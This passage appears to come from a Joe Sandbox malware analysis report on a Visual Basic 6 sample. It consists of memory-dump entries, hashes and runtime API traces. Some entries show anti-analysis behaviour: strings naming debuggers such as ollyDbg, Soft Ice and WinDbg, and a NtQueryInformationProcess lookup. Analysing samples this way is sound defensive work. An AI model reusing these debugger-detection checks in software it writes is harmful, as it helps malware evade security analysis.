                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateChkstkMemoryVirtual__vba
                                                                    • String ID:
                                                                    • API String ID: 3513745053-0
                                                                    • Opcode ID: 98c255a1420ec23d717739530212359ca2362c26a9bfa024e3cdd47f691dd7d4
                                                                    • Instruction ID: 6b1dfaa902795fe47e0719df23f8dff7256f70da6c1c19698192f0758a35f7bd
                                                                    • Opcode Fuzzy Hash: 98c255a1420ec23d717739530212359ca2362c26a9bfa024e3cdd47f691dd7d4
                                                                    • Instruction Fuzzy Hash: 52D0C2B0440344BAC6119B858D0BF5ABEACF705F48F108C5EF00473580D3B868409166
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 0-2781105232
                                                                    • Opcode ID: ef2d08c63cdb670e00455a678b60a976ede209c45352bada566071cf405533ee
                                                                    • Instruction ID: 39437d41843279c9b1d8fe9b2221ea3c523c588a971dd3255f2e60df14f1badb
                                                                    • Opcode Fuzzy Hash: ef2d08c63cdb670e00455a678b60a976ede209c45352bada566071cf405533ee
                                                                    • Instruction Fuzzy Hash: 66F030307D4101EEDAF1AA24CC4AFAA2FA5FB54B5CF209871F406EA1D2E664DC42D613
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
                                                                    • Instruction ID: 9b62f8612bea4c1f048c355e184b6d3095a24f56cc9b2f37f1a4196471be53bc
                                                                    • Opcode Fuzzy Hash: ef41f23567e4e7422021a95af9bb6b13c8200b2295415d293bf1cf4d9d63b1a6
                                                                    • Instruction Fuzzy Hash: A301AF36681146CBCBA5AF08C040AF5BBA7FB70368F954466D8458BB14E266EDC0D617
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
                                                                    • Instruction ID: e13e9236c469c0b5e11b5e3c21d379a51fb769660c8777bb9a7437aa7c888af4
                                                                    • Opcode Fuzzy Hash: 0b399b04e11d1ff954b26d47aa0a54e719ae22316263aa56bc50ae1b8ddb9bc6
                                                                    • Instruction Fuzzy Hash: F0F06D32638524DBC720DB99C980A6AF7F8EB8067072548A5E48DA7A14D730FC40DB90
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
                                                                    • Instruction ID: 95dff2fb833417202495218693bf5b1a421dd4471ca0001524ddc04ad995461f
                                                                    • Opcode Fuzzy Hash: 4c43a5081fe5d2bb3cd1689569c8f68dab492a46559b42270ac0312c03ebc32d
                                                                    • Instruction Fuzzy Hash: 46B0123F0716C44DDB13CF3442137E93B6593004C0F5404C1D0C04B66BC00C8687D556
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
                                                                    • Instruction ID: 75d8ee55a9432d655d400c20f764b696a43bdfdc0ccd3be24d65f6ea96f8add4
                                                                    • Opcode Fuzzy Hash: 09929421d99742cfa4a401d3ddfe35bd1712795acecd8ac35f43a2c4d427f48e
                                                                    • Instruction Fuzzy Hash: 0CB012241015C18EC9024F1041127A877A0D7019C0F0A00C494C04B513C11C8645A610
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 3e3d693b4ba6cb1b83ecea86fe5c8d0aea6e9b6d844d8fede226ee202991d3ff
                                                                    • Instruction ID: fdb1f527541a173144dfc7d98e9ba182bc058df19c1c351d8f5739ce296ceec0
                                                                    • Opcode Fuzzy Hash: 3e3d693b4ba6cb1b83ecea86fe5c8d0aea6e9b6d844d8fede226ee202991d3ff
                                                                    • Instruction Fuzzy Hash: D7B0123013A841CFC351CB05C140F3033B8F700600F0590F0E0058BD12C3389800C900
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d7d0fa4b8332a63700f79eb2f85f9aadbc3fd23bf207cb3056d904e35ee6129b
                                                                    • Instruction ID: 688611a3c886a069755d15545560ae8f0e0565b6fd227cd67c24533f4cb9b806
                                                                    • Opcode Fuzzy Hash: d7d0fa4b8332a63700f79eb2f85f9aadbc3fd23bf207cb3056d904e35ee6129b
                                                                    • Instruction Fuzzy Hash: 77B0023517A951CFC2958B46C154A6173B8B704641F4554F2E4058BD558374A904CA11
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 63e8d9fb42cead3efbf738ca5dbb2f10ffa28c1b18b18cee05bcb2a8ab82bb87
                                                                    • Instruction ID: 6e6b265050eb7b5a95baf51987ef53c485b81440fed37b79293c611cce699135
                                                                    • Opcode Fuzzy Hash: 63e8d9fb42cead3efbf738ca5dbb2f10ffa28c1b18b18cee05bcb2a8ab82bb87
                                                                    • Instruction Fuzzy Hash: DCB00971669980DFC69ACB4AC294A6073B8FB04A81F4694E4E0168F9A6D379AA44CA00
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d0d310610822cfda01494222ffe3576dc50b11e038d4fb4063e377598eb12b57
                                                                    • Instruction ID: 0d3f0663f7a423bf82b52df6c993e8513ad14c608cb40002a9890dd0f9c94cd3
                                                                    • Opcode Fuzzy Hash: d0d310610822cfda01494222ffe3576dc50b11e038d4fb4063e377598eb12b57
                                                                    • Instruction Fuzzy Hash: D3B00131279981CFC6DACB4AC294F6473BCFB45A41F4614F0F00A9F9A6DB79AE40CA05
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 79ba35aee4896a7dbc171be266e9d8b13f7985d013a2bf0f774178d1a1f2cb8e
                                                                    • Instruction ID: 7a984ded66b55bbd64144691b33356604cf1bc09b3426f3e64f0d8d58e35c1a2
                                                                    • Opcode Fuzzy Hash: 79ba35aee4896a7dbc171be266e9d8b13f7985d013a2bf0f774178d1a1f2cb8e
                                                                    • Instruction Fuzzy Hash: 28B00135266980CFC296CB0AC594F5173B8FB05B42F8625F4E4458BAA2D338A900CE01
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1339450583.0000000002270000.00000040.00001000.00020000.00000000.sdmp, Offset: 02270000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_2270000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 1b19f92bb6a62260cb77fb0fb83bfe345c3be7d5a70bace5a69a672ceb2f3423
                                                                    • Instruction ID: 9046d897fc9306a698fea5c6815737fba3a47b02c335a2d0b832d163669931cc
                                                                    • Opcode Fuzzy Hash: 1b19f92bb6a62260cb77fb0fb83bfe345c3be7d5a70bace5a69a672ceb2f3423
                                                                    • Instruction Fuzzy Hash: 8CB00135266981CFD296CB0AC194F5073B8FB04A41F4655F1E4059BA62C738A900CA00
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054DD8D
                                                                    • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,0000000B,00000000,?,?,?,?,00401006), ref: 0054DDB5
                                                                    • __vbaVarCopy.MSVBVM60 ref: 0054DDF0
                                                                    • __vbaStrCat.MSVBVM60(0040AA48,0040AB88), ref: 0054DDFF
                                                                    • __vbaStrMove.MSVBVM60(0040AA48,0040AB88), ref: 0054DE09
                                                                    • __vbaStrCat.MSVBVM60(0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE14
                                                                    • __vbaStrMove.MSVBVM60(0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE1E
                                                                    • __vbaStrCat.MSVBVM60(0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE29
                                                                    • __vbaStrMove.MSVBVM60(0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE33
                                                                    • __vbaStrCat.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE3E
                                                                    • __vbaStrMove.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE48
                                                                    • __vbaStrCat.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE53
                                                                    • __vbaVarZero.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE88
                                                                    • __vbaStrCat.MSVBVM60(0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DE97
                                                                    • __vbaStrMove.MSVBVM60(0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEA1
                                                                    • __vbaStrCat.MSVBVM60(0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEAC
                                                                    • __vbaStrMove.MSVBVM60(0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEB6
                                                                    • __vbaStrCat.MSVBVM60(0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DEC1
                                                                    • __vbaStrMove.MSVBVM60(0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000,0040AA48,0040AB88), ref: 0054DECB
                                                                    • __vbaStrCat.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000), ref: 0054DED6
                                                                    • __vbaStrMove.MSVBVM60(0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040AA50,00000000), ref: 0054DEE0
                                                                    • __vbaStrCat.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000), ref: 0054DEEB
                                                                    • __vbaVarZero.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000), ref: 0054DF20
                                                                    • #698.MSVBVM60(?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000,0040AB98,00000000), ref: 0054DF2B
                                                                    • #698.MSVBVM60(?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88,0040ABA0,00000000), ref: 0054DF36
                                                                    • #698.MSVBVM60(?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4,00000000,0040A2DC,0040AB88), ref: 0054DF44
                                                                    • __vbaVarCat.MSVBVM60(?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000,0040AB90,00000000,0040A2E4), ref: 0054DF55
                                                                    • __vbaVarCat.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DF69
                                                                    • __vbaVarZero.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DF8A
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DFC3
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054DFFC
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054E035
                                                                    • __vbaVarCopy.MSVBVM60(?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000,0040AB98,00000000), ref: 0054E06E
                                                                    • __vbaStrCat.MSVBVM60(0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000), ref: 0054E07D
                                                                    • __vbaStrMove.MSVBVM60(0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049,0040ABA0,00000000), ref: 0054E087
                                                                    • __vbaStrCat.MSVBVM60(0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E092
                                                                    • __vbaStrMove.MSVBVM60(0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044,?,00000049), ref: 0054E09C
                                                                    • __vbaStrCat.MSVBVM60(0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E0A7
                                                                    • __vbaStrMove.MSVBVM60(0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041,?,00000044), ref: 0054E0B1
                                                                    • __vbaStrCat.MSVBVM60(0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041), ref: 0054E0BC
                                                                    • __vbaStrMove.MSVBVM60(0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?,?,00000041), ref: 0054E0C6
                                                                    • __vbaStrCat.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E0D1
                                                                    • __vbaVarZero.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E106
                                                                    • __vbaVarCopy.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E13F
                                                                    • __vbaVarCopy.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E178
                                                                    • __vbaVarCopy.MSVBVM60(0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?,?,?), ref: 0054E1B1
                                                                    • #601.MSVBVM60(?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?,00000000,?), ref: 0054E1C4
                                                                    • __vbaErase.MSVBVM60(00000000,?,?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18,?,?), ref: 0054E1D2
                                                                    • __vbaAryVar.MSVBVM60(0000200C,?,00000000,?,?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000,0040A1D0,0040AC18), ref: 0054E1E3
                                                                    • __vbaAryCopy.MSVBVM60(?,?,0000200C,?,00000000,?,?,?,0040ABA0,00000000,0040AB98,00000000,0040AC20,00000000,0040A1D0,00000000), ref: 0054E1F9
                                                                    • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000200C), ref: 0054E230
                                                                    • __vbaFreeVarList.MSVBVM60(00000005,?,?,?,?,?), ref: 0054E254
                                                                    • __vbaStrVarVal.MSVBVM60(?,?), ref: 0054E2AB
                                                                    • #644.MSVBVM60(00000000,?,?), ref: 0054E2B1
                                                                    • #644.MSVBVM60(00000000,00000000,?,?), ref: 0054E2BE
                                                                    • __vbaSetSystemError.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054E2D5
                                                                    • __vbaFreeStr.MSVBVM60(?,00000000,00000000,00000000,?,?), ref: 0054E2F2
                                                                    • __vbaAryDestruct.MSVBVM60(00000000,?,0054E3AB), ref: 0054E3A5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$Move$Copy$Zero$#698Free$#644List$#601ChkstkDestructEraseErrorRedimSystem
                                                                    • String ID: (W$ObsidianGUI$Rock Debugger$Soft Ice$WinDbgFrameClass$WindDbg$Zeta Debugger$ollyDbg
                                                                    • API String ID: 965276749-4266984186
                                                                    • Opcode ID: 0bd795aa534cc1f2e85e50ffcc6169e215c1c6e7aeac8c94371ca5ce6801286a
                                                                    • Instruction ID: 43b833a18e47caea910ad6117162663c4401d64ac9d9e99559d3597631243f42
                                                                    • Opcode Fuzzy Hash: 0bd795aa534cc1f2e85e50ffcc6169e215c1c6e7aeac8c94371ca5ce6801286a
                                                                    • Instruction Fuzzy Hash: 29F112719002589BDB18DBA4CC45FEE77B8BF08344F1045AAF605BB291DB78AA84CF55
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0055325E
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 0055329F
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 005532EC
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000058), ref: 0055332D
                                                                    • __vbaChkstk.MSVBVM60(00000000,?,0040B960,00000058), ref: 00553352
                                                                    • #689.MSVBVM60(?,Options,Show Tips at Startup), ref: 0055336D
                                                                    • __vbaStrMove.MSVBVM60(?,Options,Show Tips at Startup), ref: 00553377
                                                                    • __vbaI4Str.MSVBVM60(00000000,?,Options,Show Tips at Startup), ref: 0055337D
                                                                    • __vbaFreeStrList.MSVBVM60(00000002,?,?,00000000,?,Options,Show Tips at Startup), ref: 0055338F
                                                                    • __vbaFreeObj.MSVBVM60(?,?,00401006), ref: 0055339A
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40), ref: 005533BC
                                                                    • __vbaObjSetAddref.MSVBVM60(?,0057E468), ref: 005533E9
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 00553412
                                                                    • __vbaFreeObj.MSVBVM60(00000000,?,0040B18C,00000010), ref: 00553429
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1338899926.000000000040B000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.1338841597.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338861845.0000000000401000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1338885898.000000000040A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339003333.000000000057E000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.000000000057F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339017269.0000000000581000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1339045246.0000000000583000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_D6yz87XjgM.jbxd
                                                                    Similarity
                                                                    • API ID: __vba$CheckFreeHresult$ChkstkNew2$#689AddrefListMove
                                                                    • String ID: file was not found? $ using NotePad with 1 tip per line. $Create a text file named $Options$Show Tips at Startup$That the $Then place it in the same directory as the application. $hW$hW
                                                                    • API String ID: 481385995-4225297203
                                                                    • Opcode ID: 3576d6cdde44d285bdecc183007a296bcd05239b3c329f6d04b8cb3a7dff0b85
                                                                    • Instruction ID: 5e4e99fb6c1ced7cd825e54d8eb7403a416cc1bd3b72b80154bb296a3372dd30
                                                                    • Opcode Fuzzy Hash: 3576d6cdde44d285bdecc183007a296bcd05239b3c329f6d04b8cb3a7dff0b85
                                                                    • Instruction Fuzzy Hash: F5F10471E00208AFDB15EFA0C856BEDBBB5BF08345F20406AF509BB1A1DB785A48DB54
                                                                    APIs
                                                                    • __vbaChkstk.MSVBVM60(?,00401006), ref: 0054F623
                                                                    • __vbaNew2.MSVBVM60(0040B19C,0057FB40,?,?,?,?,00401006), ref: 0054F664
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B18C,00000014), ref: 0054F6B1
                                                                    • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040B960,00000060), ref: 0054F6F2
                                                                    • __vbaStrCat.MSVBVM60(?,Info zu ), ref: 0054F70E
